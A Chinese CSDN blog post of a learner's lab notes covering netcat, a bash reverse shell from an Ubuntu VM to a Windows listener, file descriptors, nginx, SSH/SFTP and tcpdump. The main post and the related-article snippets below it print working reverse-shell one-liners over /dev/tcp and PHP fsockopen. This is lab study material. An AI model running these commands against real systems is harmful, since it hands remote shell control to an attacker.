Bash反弹shell & 搭建网页服务器 & 文件描述符学习 & ssh连接vm虚拟机 & sftp进行文件传输 & Linux抓包

于 2024-05-22 10:17:18 发布
阅读量1k 收藏 14
点赞数 27
分类专栏: Linux相关 Web专项 文章标签: 服务器 bash 学习 反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65474192/article/details/139112813
版权

环境:
kali:

┌──(kali㉿kali)-[~/Desktop]
└─$ cat /proc/version
Linux version 6.0.0-kali5-amd64 (devel@kali.org) (gcc-12 (Debian 12.2.0-9) 12.2.0, GNU ld (GNU Binutils for Debian)
1. 建立一个简单的链接进行nc,可以进行两个端口通信!
#首先使用nc监听端口
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvp 1234            
listening on [any] 1234 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 47210

#使用nc链接本地端口
┌──(kali㉿kali)-[~/Desktop]
└─$ nc 127.0.0.1 1234       
hello
ls
2. 试图向/dev/tcp/127.0.0.1/1234发送数据失败!

原因:反弹shell失败 原来是这个原因_反弹shell时kali监听不到端口数据怎么办-CSDN博客
kali无法实现因为:kali的bash是默认关闭bash的网络重定向选项,也就是–enable-net-redirections选项
解决方法重写下载bash并重新编译:

wget https://ftp.gnu.org/gnu/bash/bash-5.1.tar.gz
tar -xzvf bash-5.1.tar.gz
cd bash-5.1
./configure --enable-net-redirections
make
sudo make install
3.在Ubuntu上实现向本地端口发送数据

这个文件路径是虚拟的:/dev/tcp/127.0.0.1/1234
tty1:

brinmon@brinmon-virtual-machine:~/桌面$ nc -lvp 1234
Listening on 0.0.0.0 1234
Connection received on localhost 59588
djajaslkdjalskdjlaksjdlka

tty2:

brinmon@brinmon-virtual-machine:~/桌面$ cat 1.txt > /dev/tcp/127.0.0.1/1234
4.实现反弹shell

攻击者机器Windows 10:
环境:netcat 1.11 for Win32/Win64 (eternallybored.org)

#监听1234端口
┌──E:\ReverseTools\netcat-win32-1.12
└─>nc -lvp 1234

被攻击者:Ubuntu

#被攻击者执行该命令
┌──brinmon@brinmon-virtual-machine:~/桌面
└─$ bash -i >& /dev/tcp/192.168.235.1/1234 0>&1

这条命令的作用:

  1. 通过bash启动一个shell命令窗口,将这个窗口的输出重定位到攻击者的机器上
  2. 0>&1 ,1代表标准输出,已经指向攻击者的机器了,所以这条命令的作用是将标准输入也重定向到攻击者的机器
    注:192.168.235.1是本机的网关,因为是本地所以可以不需要是用ip,当然也可以使用

命令解释:
0. /dev/tcp/192.168.235.1/1234 攻击者开启的端口

  1. bash -i 启动一个shell命令窗口
  2. > 表示重定向输出
  3. & 表示将标准输出和标准错误重定向到同一个地方
  4. 0 表示标准输入(stdin)。
  5. 1 表示标准输出(stdout)。
  6. 0>&1 表示将标准输入重定向到标准输出,使得输入和输出都通过前面建立的 TCP 连接进行传输。
    成功获得shell:
5.文件描述符的使用
#include <stdio. h>
int main() {
	FILE *f = fopen( "1.txt" ,wb");//会创建文件描述符3
	system( "echo hello123 >&3");//>&3默认就算将0>&3,将标准输出重定向到文件1.txt
	fclose(f);
}
6.搭建网页服务器
  1. 安装nginx服务
root@brinmon-virtual-machine:/home/brinmon/桌面# apt-get install nginx
  1. 查看是否启动nginx服务
root@brinmon-virtual-machine:/var/www/html# sudo systemctl status nginx
● nginx.service - A high performance web server and a reverse proxy server
     Loaded: loaded (/lib/systemd/system/nginx.service; enabled; preset: enabled)
     Active: active (running) since Tue 2024-05-21 22:14:18 CST; 4min 47s ago
       Docs: man:nginx(8)
    Process: 3469 ExecStartPre=/usr/sbin/nginx -t -q -g daemon on; master_process on; (co>
    Process: 3470 ExecStart=/usr/sbin/nginx -g daemon on; master_process on; (code=exited>
   Main PID: 3558 (nginx)
      Tasks: 5 (limit: 2219)
     Memory: 6.2M
        CPU: 35ms
     CGroup: /system.slice/nginx.service
             ├─3558 "nginx: master process /usr/sbin/nginx -g daemon on; master_process o>
             ├─3560 "nginx: worker process"
             ├─3561 "nginx: worker process"
             ├─3562 "nginx: worker process"
             └─3563 "nginx: worker process"
  1. 可以去目录下编辑网页
root@brinmon-virtual-machine:/home/brinmon/桌面# cd /var/www/html
root@brinmon-virtual-machine:/var/www/html# ls
index.nginx-debian.html

index.nginx-debian.html就是我们的网页了!可以手动修改访问这个网页直接输入本机ip就好了!

成功:欢迎来到nginx! — Welcome to nginx!

7.ssh连接vm虚拟机

教程:SSH远程连接linux虚拟机详细步骤(超详细)_ssh连接虚拟机-CSDN博客

  1. 设置虚拟机的网络模式为NAT模式

  2. 在linux上下载ssh服务,openssh-server

#下载ssh服务
root@brinmon-virtual-machine:/var/www/html# sudo apt install openssh-server
#重启服务
root@brinmon-virtual-machine:/var/www/html# sudo service ssh restart
  1. 通过Windows连接linux
# ssh 用户名@ip地址   可以连接服务器
E:\ReverseTools\netcat-win32-1.12>ssh brinmon@192.168.235.128
ssh: connect to host 192.168.235.128 port 22: Connection refused

E:\ReverseTools\netcat-win32-1.12>ssh brinmon@192.168.235.128
The authenticity of host '192.168.235.128 (192.168.235.128)' can't be established.
ECDSA key fingerprint is SHA256:BYd+bOcoliIL45ML4l90wD1g8ljJ2eRIihPgCQg4wZo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.235.128' (ECDSA) to the list of known hosts.
brinmon@192.168.235.128's password:
Welcome to Ubuntu 23.04 (GNU/Linux 6.2.0-39-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

15 更新可以立即应用。
这些更新中有 1 个是标准安全更新。
要查看这些附加更新,请运行:apt list --upgradable


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

brinmon@brinmon-virtual-machine:~$ ls
公共的  模板  视频  图片  文档  下载  音乐  桌面  pwndocker  snap  tools
8.sftp进行文件传输
E:\ReverseTools\netcat-win32-1.12>sftp brinmon@192.168.235.128
brinmon@192.168.235.128's password:
Connected to 192.168.235.128.

sftp> ls
flag.txt    pwndocker   snap        tools    
sftp> get flag.txt
Fetching /home/brinmon/flag.txt to flag.txt
/home/brinmon/flag.txt                                                                100%   23     7.6KB/s   00:00
sftp> put nc.exe
Uploading nc.exe to /home/brinmon/nc.exe
nc.exe                                                                                100%   38KB   3.4MB/s   00:00

成功下载文件:

9.Linux抓包
#就可以开始抓包了
root@brinmon-virtual-machine:/home/brinmon/桌面# tcpdump -i ens33 -w 1.cap

可以将文件传入Windows用NetAnalyzer来分析流量包!

Brinmon
关注
  • 27
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反弹Shell的基本操作
weixin_46831054的博客
11-26 993
反弹shell定义: 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连
信息安全技术(二)-- 利用 metasploit 创建并反弹 shell
yi23456qi的博客
06-19 466
知识是不断从学习中得到的,经验是从尝试中得到的!
如何用内网虚拟机kali实现反弹shell
qq_44657899的博客
05-23 9407
文章目录实验环境设置端口转发反弹shell验证为什么要反弹shell? 这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。 实验环境 攻击机:kali虚拟机(位于内网) ip:192.168.77.128 宿主机:win10(位于外网) ip:10.8.163.224 受害端:centos-7 设置端口转发 虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我
10种反弹shell方式
kevinhanser
03-30 4886
参考链接1:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 参考链接2:https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html 10种反弹shell方式 2019年3月30日【原创】 bash perl py...
【安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6054
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
Windows10与虚拟机win7在vmnet1(仅主机模式下)使用nc进行反弹shell练习
最新发布
m0_47402792的博客
01-07 442
Windows10与虚拟机win7在vmnet1(仅主机模式下)使用nc进行反弹shell练习
linux通过跳板机连接远程服务器进行文件传输的方法
09-14
Linux环境中,经常需要通过跳板机(jump host)来连接到远程服务器,以便进行系统管理、软件部署和文件传输等工作。跳板机通常用于多级安全架构,它作为一个中间节点,允许管理员从一个安全区域进入另一个更敏感的...
Bash文件描述符的详细介绍
09-15
Linux系统中,一切皆文件,包括设备、网络连接等,都可以通过文件描述符进行操作。 默认情况下,每个进程有三个标准文件描述符: 1. **stdin(标准输入)**:文件描述符0,通常关联到键盘,供程序读取用户输入。...
浅析Linuxbash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
反弹shell常见方法总结
qq_45746681的博客
10-08 725
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一.Bash反弹二.telnet反弹三.nc反弹四.常见脚本反弹: 前言 记录并总结下常用到的各种反弹shell的姿势,方便以后使用 环境:攻击机:windows,192.168.0.105 服务器:kail,192.168.0.107 一.Bash反弹 首先在攻击机上执行 nc -lvvp 3333 进行监听 在kail机上执行 bash -i >& /dev/tcp/192.168.0.105/3333
windows 反弹shell_怎么反弹shell(reverse shell
weixin_39956451的博客
11-19 2130
在我们渗透测试的过程中,最常用的就是基于tcp/udp协议反弹一个shell,也就是反向连接。我们先来讲一下什么是正向连接和反向连接。正向连接:我们本机去连接目标机器,比如ssh和mstsc反向连接:目标机器去连接我们本机那么为什么反向连接会比较常用呢目标机器处在局域网内,我们正向连不上他目标机器是动态ip目标机器存在防火墙然后说一下我的实验环境虚拟机采用nat模式攻击机:Kali Linux :...
ssh配置文件详解
君逍遥o
09-06 4546
简单来说,ssh是一种网络协议,用于计算机之间的加密登录。 如果一个用户从本地计算机,使用ssh协议登录另一台远程计算机,我们就可以认为,这种登录是安全的,即使被中途截获,密码也不会泄露。 需要指出的是,ssh只有一种协议,存在多种实现,既有商业实现,也有开源实现。
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1155
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
内网kali 通过ngrok穿透反弹shell
失心少年
08-05 7767
1、在ngrok注册账号,并且开通免费隧道(网址:https://www.ngrok.cc) 这里我kali的内网ip地址是10.10.10.131 2、.下载Ngrok客户端 (地址https://www.ngrok.cc/download.html) 解压后上传至kali 或者传到kali后unzip 命令进行解压 得到一个sunny文件 3...
Linux简单渗透、反弹shell、常见脚本反弹方法
zhao__b的博客
11-26 2302
Linux简单渗透 这是我在课堂上做的一个小实验,首先电脑要有Java软件,没有去电脑管家下载一个,用于后期渗透。 第一步:打开软件点击管理,会出现让我们生成的界面,密码、密钥可以改,自己记住就行,这里我用的默认,有效载荷更具自己需求更改,这里我用的php,然后点击生成。 第二步:点击生成后会让我们选择一个存放文件地址,更具自己想放那放那,然后会在存放文件里生成一个php文件,右击我们用notepad++(这里我用的是notepad++)打开可以看到文件里的内容。 第三步:把刚才..
shell反弹的几种方式
nextdoor6的博客
05-16 5853
直接利用linux上的bash进行反弹 nc本地监听 nc -l -p port -vv base反弹 bash -i >& /dev/tcp/ownip/port 0>&1 利用其他服务器运行环境反弹,比如php,python等。 nc本地监听nc -l -p port -vvv php -r '$sock=fsockopen("10.0.0.1",1234);exec
常见的反弹shell的方法以及对反弹shell的解释
热门推荐
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
反弹shell学习
qq_45766062的博客
10-29 362
什么是反弹shell 反弹shell就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转,简单来说就是你作为tacker想连接到受害者电脑上,然后受害者主动发送了一个连接要求给你。 为什么要反弹shell 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值